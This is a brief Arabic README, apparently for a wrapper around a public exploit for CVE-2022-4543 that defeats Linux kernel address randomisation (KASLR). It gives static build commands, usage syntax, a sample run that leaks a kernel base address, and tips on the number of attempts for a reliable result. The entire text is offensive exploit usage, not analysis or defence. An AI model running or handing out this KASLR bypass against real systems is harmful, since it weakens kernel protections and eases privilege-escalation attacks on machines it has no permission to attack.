
هذا مغلّف لاستغلال willsroot الخاص بـ CVE-2022-4543 لمساعدتك في تحديد عنوان قاعدة النواة والحصول عليه.
بناءً على طلبك (اختياري):
gcc dekaslr.c --static -o dekaslr
g++ main.cpp --static -o main
بالنسبة لبعض أنظمة التشغيل، ثبّت libc الثابتة أولاً.
./main
[*] Usage: ./binary dekaslr_path entry_SYSCALL_64_offset(in hex) max_loop
$ ./main ./dekaslr 0x100000 200
ffffffffa2600000: 53/200
بعد تشغيل البرنامجين معًا، سيعطيك العنوان الأكثر تكرارًا بناءً على الإزاحة التي حددتها.
عمليًا، سيظهر عنوان قاعدة النواة الحقيقي في أكثر من ربع إجمالي المحاولات. يُنصح بأكثر من 100 محاولة.